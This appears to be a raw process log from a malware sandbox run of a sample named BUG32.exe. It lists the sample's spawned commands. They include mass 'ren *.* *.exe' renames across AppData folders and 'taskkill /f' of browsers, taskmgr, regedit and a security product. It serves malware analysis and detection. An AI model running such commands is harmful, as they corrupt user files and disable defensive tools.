    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\S\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\CEF\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Comms\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\ConnectedDevicesPlatform\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\D3DSCache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Google\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\History\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Packages\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Publishers\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im msedge.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\SolidDocuments\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temp\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im microsoftedge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im notepad.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im mspaint.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im skype.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im bing.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im eset.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im edge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temporary Internet Files\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Color\Profiles\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\CEF\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im msedge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im microsoftedge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im notepad.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\D3DSCache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\History\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im mspaint.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im skype.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Packages\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Publishers\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im eset.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\SolidDocuments\*.*" "*.exe"
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im edge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\VirtualStore\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe"
    Source: C:\Users\user\Desktop\BUG32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\CEF\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\History\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
